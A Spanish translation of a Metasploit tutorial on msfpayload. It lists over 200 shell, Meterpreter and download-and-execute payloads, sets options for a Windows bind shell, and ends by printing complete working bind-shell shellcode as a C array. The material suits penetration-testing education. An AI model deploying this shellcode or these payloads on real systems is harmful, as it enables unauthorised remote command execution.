Msfpayload
De www.metasploit-es.com.ar
Msfpayload
msfpayload es una instancia de linea de comandos de Metasploit que se utiliza para generar y dar salida a los varios tipos de shellcode disponibles en Metasploit. El uso mas comun de esta herramienta es para la generacion de shellcode para un exploit que no este actualmente en Metasploit Framework o para probar los diferentes tipos de shellcode y opciones antes de finalizar un modulo.
Esta herramienta tiene muchas opciones diferentes y variables disponibles, pero es posible que no todas esten completamente acabadas, dada la limitada salida del banner de ayuda.
root@bt:~# msfpayload -h Usage: /pentest/exploits/framework3/msfpayload [] [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar> OPTIONS: -h Help banner -l List available payloads
Como de poderosa puede ser esta herramienta puede verse al mostrar el gran numero de tipos diferentes de shellcode disponibles para ser personalizados para tu exploit especifico:
root@bt:~# msfpayload -l Framework Payloads (222 total) ============================== Name Description ---- ----------- aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell aix/ppc/shell_find_port Spawn a shell on an established connection aix/ppc/shell_interact Simply execve /bin/sh (for inetd programs) aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell bsd/sparc/shell_bind_tcp Listen for a connection and spawn a command shell bsd/sparc/shell_reverse_tcp Connect back to attacker and spawn a command shell bsd/x86/exec Execute an arbitrary command bsd/x86/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service bsd/x86/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service bsd/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged) bsd/x86/shell/find_tag Use an established connection, Spawn a command shell (staged) bsd/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged) bsd/x86/shell_bind_tcp Listen for a connection and spawn a command shell bsd/x86/shell_find_port Spawn a shell on an established connection bsd/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe) bsd/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell bsdi/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged) bsdi/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged) bsdi/x86/shell_bind_tcp Listen for a connection and spawn a command shell bsdi/x86/shell_find_port Spawn a shell on an established connection bsdi/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell cmd/unix/bind_inetd Listen for a connection and spawn a command shell (persistent) cmd/unix/bind_netcat Listen for a connection and spawn a command shell via netcat cmd/unix/bind_perl Listen for a connection and spawn a command shell via perl cmd/unix/bind_ruby Continually listen for a connection and spawn a command shell via Ruby cmd/unix/generic Executes the supplied command cmd/unix/interact Interacts with a shell on an established socket connection cmd/unix/reverse Creates an interactive shell through two inbound connections cmd/unix/reverse_bash Creates an interactive shell via bash's builtin /dev/tcp. This will not work on most Debian-based Linux distributions (including Ubuntu) because they compile bash without the /dev/tcp feature. cmd/unix/reverse_netcat Creates an interactive shell via netcat cmd/unix/reverse_perl Creates an interactive shell via perl cmd/unix/reverse_ruby Connect back and create a command shell via Ruby cmd/windows/adduser Create a new user and add them to local administration group cmd/windows/bind_perl Listen for a connection and spawn a command shell via perl (persistent) cmd/windows/bind_ruby Continually listen for a connection and spawn a command shell via Ruby cmd/windows/download_exec_vbs Download an EXE from an HTTP(S) URL and execute it cmd/windows/reverse_perl Creates an interactive shell via perl cmd/windows/reverse_ruby Connect back and create a command shell via Ruby generic/debug_trap Generate a debug trap in the target process generic/shell_bind_tcp Listen for a connection and spawn a command shell generic/shell_reverse_tcp Connect back to attacker and spawn a command shell generic/tight_loop Generate a tight loop in the target process java/jsp_shell_bind_tcp Listen for a connection and spawn a command shell java/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell java/meterpreter/bind_tcp Listen for a connection, Run a meterpreter server in Java java/meterpreter/reverse_tcp Connect back stager, Run a meterpreter server in Java java/shell/bind_tcp Listen for a connection, Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else) java/shell/reverse_tcp Connect back stager, Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else) linux/armle/adduser Create a new user with UID 0 linux/armle/exec Execute an arbitrary command linux/armle/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/mipsbe/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/mipsle/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/ppc/shell_bind_tcp Listen for a connection and spawn a command shell linux/ppc/shell_find_port Spawn a shell on an established connection linux/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/ppc64/shell_bind_tcp Listen for a connection and spawn a command shell linux/ppc64/shell_find_port Spawn a shell on an established connection linux/ppc64/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/x64/exec Execute an arbitrary command linux/x64/shell/bind_tcp Listen for a connection, Spawn a command shell (staged) linux/x64/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged) linux/x64/shell_bind_tcp Listen for a connection and spawn a command shell linux/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/x86/adduser Create a new user with UID 0 linux/x86/chmod Runs chmod on specified file with specified mode linux/x86/exec Execute an arbitrary command linux/x86/meterpreter/bind_ipv6_tcp Listen for a connection over IPv6, Staged meterpreter server linux/x86/meterpreter/bind_tcp Listen for a connection, Staged meterpreter server linux/x86/meterpreter/find_tag Use an established connection, Staged meterpreter server linux/x86/meterpreter/reverse_ipv6_tcp Connect back to attacker over IPv6, Staged meterpreter server linux/x86/meterpreter/reverse_tcp Connect back to the attacker, Staged meterpreter server linux/x86/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service linux/x86/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service linux/x86/shell/bind_ipv6_tcp Listen for a connection over IPv6, Spawn a command shell (staged) linux/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged) linux/x86/shell/find_tag Use an established connection, Spawn a command shell (staged) linux/x86/shell/reverse_ipv6_tcp Connect back to attacker over IPv6, Spawn a command shell (staged) linux/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged) linux/x86/shell_bind_ipv6_tcp Listen for a connection over IPv6 and spawn a command shell linux/x86/shell_bind_tcp Listen for a connection and spawn a command shell linux/x86/shell_find_port Spawn a shell on an established connection linux/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe) linux/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/x86/shell_reverse_tcp2 Connect back to attacker and spawn a command shell netware/shell/reverse_tcp Connect back to the attacker, Connect to the NetWare console (staged) osx/armle/execute/bind_tcp Listen for a connection, Spawn a command shell (staged) osx/armle/execute/reverse_tcp Connect back to the attacker, Spawn a command shell (staged) osx/armle/shell/bind_tcp Listen for a connection, Spawn a command shell (staged) osx/armle/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged) osx/armle/shell_bind_tcp Listen for a connection and spawn a command shell osx/armle/shell_reverse_tcp Connect back to attacker and spawn a command shell osx/armle/vibrate Causes the iPhone to vibrate, only works when the AudioToolkit library has been loaded. Based on work by Charlie Miller . osx/ppc/shell/bind_tcp Listen for a connection, Spawn a command shell (staged) osx/ppc/shell/find_tag Use an established connection, Spawn a command shell (staged) osx/ppc/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged) osx/ppc/shell_bind_tcp Listen for a connection and spawn a command shell osx/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell osx/x86/bundleinject/bind_tcp Listen, read length, read buffer, execute, Inject a custom Mach-O bundle into the exploited process osx/x86/bundleinject/reverse_tcp Connect, read length, read buffer, execute, Inject a custom Mach-O bundle into the exploited process osx/x86/exec Execute an arbitrary command osx/x86/isight/bind_tcp Listen, read length, read buffer, execute, Inject a Mach-O bundle to capture a photo from the iSight (staged) osx/x86/isight/reverse_tcp Connect, read length, read buffer, execute, Inject a Mach-O bundle to capture a photo from the iSight (staged) osx/x86/shell_bind_tcp Listen for a connection and spawn a command shell osx/x86/shell_find_port Spawn a shell on an established connection osx/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell osx/x86/vforkshell/bind_tcp Listen, read length, read buffer, execute, Call vfork() if necessary and spawn a command shell (staged) osx/x86/vforkshell/reverse_tcp Connect, read length, read buffer, execute, Call vfork() if necessary and spawn a command shell (staged) osx/x86/vforkshell_bind_tcp Listen for a connection, vfork if necessary, and spawn a command shell osx/x86/vforkshell_reverse_tcp Connect back to attacker, vfork if necessary, and spawn a command shell php/bind_perl Listen for a connection and spawn a command shell via perl (persistent) php/bind_php Listen for a connection and spawn a command shell via php php/download_exec Download an EXE from an HTTP URL and execute it php/exec Execute a single system command php/meterpreter/bind_tcp Listen for a connection, Run a meterpreter server in PHP php/meterpreter/reverse_tcp Reverse PHP connect back stager with checks for disabled functions, Run a meterpreter server in PHP php/meterpreter_reverse_tcp Connect back to attacker and spawn a Meterpreter server (PHP) php/reverse_perl Creates an interactive shell via perl php/reverse_php Reverse PHP connect back shell with checks for disabled functions php/shell_findsock Spawn a shell on the established connection to the webserver. Unfortunately, this payload can leave conspicuous evil-looking entries in the apache error logs, so it is probably a good idea to use a bind or reverse shell unless firewalls prevent them from working. The issue this payload takes advantage of (CLOEXEC flag not set on sockets) appears to have been patched on the Ubuntu version of Apache and may not work on other Debian-based distributions. Only tested on Apache but it might work on other web servers that leak file descriptors to child processes. solaris/sparc/shell_bind_tcp Listen for a connection and spawn a command shell solaris/sparc/shell_find_port Spawn a shell on an established connection solaris/sparc/shell_reverse_tcp Connect back to attacker and spawn a command shell solaris/x86/shell_bind_tcp Listen for a connection and spawn a command shell solaris/x86/shell_find_port Spawn a shell on an established connection solaris/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell tty/unix/interact Interacts with a TTY on an established socket connection windows/adduser Create a new user and add them to local administration group windows/dllinject/bind_ipv6_tcp Listen for a connection over IPv6, Inject a Dll via a reflective loader windows/dllinject/bind_nonx_tcp Listen for a connection (No NX), Inject a Dll via a reflective loader windows/dllinject/bind_tcp Listen for a connection, Inject a Dll via a reflective loader windows/dllinject/find_tag Use an established connection, Inject a Dll via a reflective loader windows/dllinject/reverse_http Tunnel communication over HTTP using IE 6, Inject a Dll via a reflective loader windows/dllinject/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject a Dll via a reflective loader windows/dllinject/reverse_nonx_tcp Connect back to the attacker (No NX), Inject a Dll via a reflective loader windows/dllinject/reverse_ord_tcp Connect back to the attacker, Inject a Dll via a reflective loader windows/dllinject/reverse_tcp Connect back to the attacker, Inject a Dll via a reflective loader windows/dllinject/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a Dll via a reflective loader windows/dllinject/reverse_tcp_dns Connect back to the attacker, Inject a Dll via a reflective loader windows/download_exec Download an EXE from an HTTP URL and execute it windows/exec Execute an arbitrary command windows/messagebox Spawns a dialog via MessageBox using a customizable title, text & icon windows/meterpreter/bind_ipv6_tcp Listen for a connection over IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) windows/meterpreter/bind_nonx_tcp Listen for a connection (No NX), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) windows/meterpreter/bind_tcp Listen for a connection, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) windows/meterpreter/find_tag Use an established connection, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) windows/meterpreter/reverse_http Tunnel communication over HTTP using IE 6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) windows/meterpreter/reverse_https Tunnel communication over HTTP using SSL, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) windows/meterpreter/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) windows/meterpreter/reverse_nonx_tcp Connect back to the attacker (No NX), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) windows/meterpreter/reverse_ord_tcp Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) windows/meterpreter/reverse_tcp Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) windows/meterpreter/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) windows/meterpreter/reverse_tcp_dns Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) windows/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service windows/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service windows/patchupdllinject/bind_ipv6_tcp Listen for a connection over IPv6, Inject a custom DLL into the exploited process windows/patchupdllinject/bind_nonx_tcp Listen for a connection (No NX), Inject a custom DLL into the exploited process windows/patchupdllinject/bind_tcp Listen for a connection, Inject a custom DLL into the exploited process windows/patchupdllinject/find_tag Use an established connection, Inject a custom DLL into the exploited process windows/patchupdllinject/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject a custom DLL into the exploited process windows/patchupdllinject/reverse_nonx_tcp Connect back to the attacker (No NX), Inject a custom DLL into the exploited process windows/patchupdllinject/reverse_ord_tcp Connect back to the attacker, Inject a custom DLL into the exploited process windows/patchupdllinject/reverse_tcp Connect back to the attacker, Inject a custom DLL into the exploited process windows/patchupdllinject/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a custom DLL into the exploited process windows/patchupdllinject/reverse_tcp_dns Connect back to the attacker, Inject a custom DLL into the exploited process windows/patchupmeterpreter/bind_ipv6_tcp Listen for a connection over IPv6, Inject the meterpreter server DLL (staged) windows/patchupmeterpreter/bind_nonx_tcp Listen for a connection (No NX), Inject the meterpreter server DLL (staged) windows/patchupmeterpreter/bind_tcp Listen for a connection, Inject the meterpreter server DLL (staged) windows/patchupmeterpreter/find_tag Use an established connection, Inject the meterpreter server DLL (staged) windows/patchupmeterpreter/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject the meterpreter server DLL (staged) windows/patchupmeterpreter/reverse_nonx_tcp Connect back to the attacker (No NX), Inject the meterpreter server DLL (staged) windows/patchupmeterpreter/reverse_ord_tcp Connect back to the attacker, Inject the meterpreter server DLL (staged) windows/patchupmeterpreter/reverse_tcp Connect back to the attacker, Inject the meterpreter server DLL (staged) windows/patchupmeterpreter/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject the meterpreter server DLL (staged) windows/patchupmeterpreter/reverse_tcp_dns Connect back to the attacker, Inject the meterpreter server DLL (staged) windows/shell/bind_ipv6_tcp Listen for a connection over IPv6, Spawn a piped command shell (staged) windows/shell/bind_nonx_tcp Listen for a connection (No NX), Spawn a piped command shell (staged) windows/shell/bind_tcp Listen for a connection, Spawn a piped command shell (staged) windows/shell/find_tag Use an established connection, Spawn a piped command shell (staged) windows/shell/reverse_http Tunnel communication over HTTP using IE 6, Spawn a piped command shell (staged) windows/shell/reverse_ipv6_tcp Connect back to the attacker over IPv6, Spawn a piped command shell (staged) windows/shell/reverse_nonx_tcp Connect back to the attacker (No NX), Spawn a piped command shell (staged) windows/shell/reverse_ord_tcp Connect back to the attacker, Spawn a piped command shell (staged) windows/shell/reverse_tcp Connect back to the attacker, Spawn a piped command shell (staged) windows/shell/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Spawn a piped command shell (staged) windows/shell/reverse_tcp_dns Connect back to the attacker, Spawn a piped command shell (staged) windows/shell_bind_tcp Listen for a connection and spawn a command shell windows/shell_bind_tcp_xpfw Disable the Windows ICF, then listen for a connection and spawn a command shell windows/shell_reverse_tcp Connect back to attacker and spawn a command shell windows/speak_pwned Causes the target to say "You Got Pwned" via the Windows Speech API windows/upexec/bind_ipv6_tcp Listen for a connection over IPv6, Uploads an executable and runs it (staged) windows/upexec/bind_nonx_tcp Listen for a connection (No NX), Uploads an executable and runs it (staged) windows/upexec/bind_tcp Listen for a connection, Uploads an executable and runs it (staged) windows/upexec/find_tag Use an established connection, Uploads an executable and runs it (staged) windows/upexec/reverse_http Tunnel communication over HTTP using IE 6, Uploads an executable and runs it (staged) windows/upexec/reverse_ipv6_tcp Connect back to the attacker over IPv6, Uploads an executable and runs it (staged) windows/upexec/reverse_nonx_tcp Connect back to the attacker (No NX), Uploads an executable and runs it (staged) windows/upexec/reverse_ord_tcp Connect back to the attacker, Uploads an executable and runs it (staged) windows/upexec/reverse_tcp Connect back to the attacker, Uploads an executable and runs it (staged) windows/upexec/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Uploads an executable and runs it (staged) windows/upexec/reverse_tcp_dns Connect back to the attacker, Uploads an executable and runs it (staged) windows/vncinject/bind_ipv6_tcp Listen for a connection over IPv6, Inject a VNC Dll via a reflective loader (staged) windows/vncinject/bind_nonx_tcp Listen for a connection (No NX), Inject a VNC Dll via a reflective loader (staged) windows/vncinject/bind_tcp Listen for a connection, Inject a VNC Dll via a reflective loader (staged) windows/vncinject/find_tag Use an established connection, Inject a VNC Dll via a reflective loader (staged) windows/vncinject/reverse_http Tunnel communication over HTTP using IE 6, Inject a VNC Dll via a reflective loader (staged) windows/vncinject/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject a VNC Dll via a reflective loader (staged) windows/vncinject/reverse_nonx_tcp Connect back to the attacker (No NX), Inject a VNC Dll via a reflective loader (staged) windows/vncinject/reverse_ord_tcp Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged) windows/vncinject/reverse_tcp Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged) windows/vncinject/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a VNC Dll via a reflective loader (staged) windows/vncinject/reverse_tcp_dns Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged) windows/x64/exec Execute an arbitrary command (Windows x64) windows/x64/meterpreter/bind_tcp Listen for a connection (Windows x64), Inject the meterpreter server DLL via the Reflective Dll Injection payload (Windows x64) (staged) windows/x64/meterpreter/reverse_tcp Connect back to the attacker (Windows x64), Inject the meterpreter server DLL via the Reflective Dll Injection payload (Windows x64) (staged) windows/x64/shell/bind_tcp Listen for a connection (Windows x64), Spawn a piped command shell (Windows x64) (staged) windows/x64/shell/reverse_tcp Connect back to the attacker (Windows x64), Spawn a piped command shell (Windows x64) (staged) windows/x64/shell_bind_tcp Listen for a connection and spawn a command shell (Windows x64) windows/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell (Windows x64) windows/x64/vncinject/bind_tcp Listen for a connection (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged) windows/x64/vncinject/reverse_tcp Connect back to the attacker (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged)
Una vez que has seleccionado un payload, hay dos conmutadores que se utilizan mas a menudo al hacer a mano el payload para el exploit que estas creando. En el siguiente ejemplo hemos seleccionado una simple Windows bind shell. Cuando añadimos el argumento de linea de comandos "O" con ese payload, obtenemos todas las opciones configurables disponibles para ese payload.
root@bt:~# msfpayload windows/shell_bind_tcp O
Name: Windows Command Shell, Bind TCP Inline
Module: payload/windows/shell_bind_tcp
Version: 8642
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 341
Rank: Normal
Provided by:
vlad902
sf
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LPORT 4444 yes The listen port
RHOST no The target address
Description:
Listen for a connection and spawn a command shell
Tal como podemos ver en la salida, podemos configurar tres opciones diferentes con un payload especifico, en caso de que se requieran, si vienen con algun parametro definido por defecto, y una descripcion corta:
EXITFUNC
Required
Default setting: process
LPORT
Required
Default setting: 4444
RHOST
Not required
No default setting
Establecer esas opciones en msfpayload es muy simple. A continuacion mostramos un ejemplo de como cambiar la tecnica de salida y el puerto a la escucha de la shell:
root@bt:~# msfpayload windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 O
Name: Windows Command Shell, Bind TCP Inline
Module: payload/windows/shell_bind_tcp
Version: 8642
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 341
Rank: Normal
Provided by:
vlad902
sf
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC seh yes Exit technique: seh, thread, process, none
LPORT 1234 yes The listen port
RHOST no The target address
Description:
Listen for a connection and spawn a command shell
Ahora que todo eso esta configurado, la unica opcion que falta especificar es el tipo de salida como C, Perl, Raw, etc. Para este ejemplo vamos a definir la salida de nuestro shellcode como C:
root@bt:~# msfpayload windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 C /* * windows/shell_bind_tcp - 341 bytes * http://www.metasploit.com * LPORT=1234, RHOST=, EXITFUNC=seh, InitialAutoRunScript=, * AutoRunScript= */ unsigned char buf[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30" "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2" "\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3" "\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58" "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff" "\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68" "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01" "\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50" "\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7" "\x31\xdb\x53\x68\x02\x00\x04\xd2\x89\xe6\x6a\x10\x56\x57\x68" "\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5" "\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75" "\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57" "\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01" "\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e" "\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56" "\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xfe\x0e\x32\xea" "\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75" "\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5";
¡Ahora ya tenemos nuestro shellcode totalmente personalizado para poderse utilizar en cualquier exploit!
© Offensive Security 2009
Original de www.offensive-security.com Traducido por cbk999
